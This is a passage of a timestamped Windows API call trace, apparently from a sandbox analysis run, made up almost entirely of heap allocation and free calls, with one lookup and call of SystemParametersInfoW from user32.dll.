HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0312.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0312.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0312.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0312.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0312.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0312.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0312.773] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0312.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0312.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0312.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0312.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0312.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0312.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0312.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0312.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0312.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0312.774] CharUpperBuffW (in: lpsz="SSA4200F01243", cchLength=0xd | out: lpsz="SSA4200F01243") returned 0xd [0312.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0312.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0312.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0312.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0312.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0312.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0312.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0312.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0312.774] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0312.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0312.775] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0312.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0312.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0312.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0312.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0312.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0312.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0312.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0312.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0312.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0312.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0312.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0312.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0312.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0312.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0312.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0312.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0312.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0312.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0312.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0312.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0312.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0312.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0312.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0312.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0312.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0312.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0312.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0312.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0312.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0312.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0312.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0312.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0312.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0312.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0312.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0312.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0312.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0312.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0312.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0312.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0312.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0312.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0312.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0312.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0312.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0312.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0312.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0312.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0312.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0312.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0312.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0312.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0312.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0312.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0312.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0312.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0312.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0312.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0312.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0312.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0312.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0312.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0312.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0312.778] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0312.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0312.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0312.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0312.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0312.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0312.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0312.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0312.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0312.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0312.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0312.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0312.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0312.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0312.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0312.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0312.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0312.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0312.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0312.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0312.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0312.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0312.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0312.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0312.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0312.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0312.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0312.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0312.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0312.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0312.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0312.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0312.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0312.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0312.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0312.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0312.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0312.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0312.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0312.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0312.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0312.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0312.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0312.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0312.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0312.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0312.781] LoadLibraryW (lpLibFileName="user32.dll") returned 0x74f40000 [0312.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0312.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0312.781] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0312.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16) returned 0x2466e10 [0312.781] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2466e10, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0312.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0312.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0312.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0312.781] GetProcAddress (hModule=0x74f40000, lpProcName="SystemParametersInfoW") returned 0x74f590d3 [0312.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0312.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0312.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0312.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0312.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0312.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0312.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0312.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0312.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0312.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0312.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0312.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0312.782] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0312.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0312.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0312.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0312.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0312.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0312.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0312.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0312.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0312.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0312.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0312.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0312.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0312.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0312.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0312.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0312.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0312.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0312.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0312.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0312.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0312.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0312.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0312.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0312.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0312.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0312.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0312.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0312.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0312.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0312.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0312.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0312.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0312.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0312.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0312.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0312.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0312.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0312.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0312.888] FreeLibrary (hLibModule=0x74f40000) returned 1 [0312.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0312.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0312.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0312.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0312.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0312.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0312.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0312.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0312.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0312.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0312.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0312.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0312.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0312.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0312.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0312.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0312.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0312.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0312.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0312.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0312.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0312.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0312.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0312.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0312.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0312.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0312.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0312.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0312.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0312.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0312.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0312.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0312.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0312.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0312.889] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0312.890] RtlAllocateHeap (HeapHandle=0x25c0000, 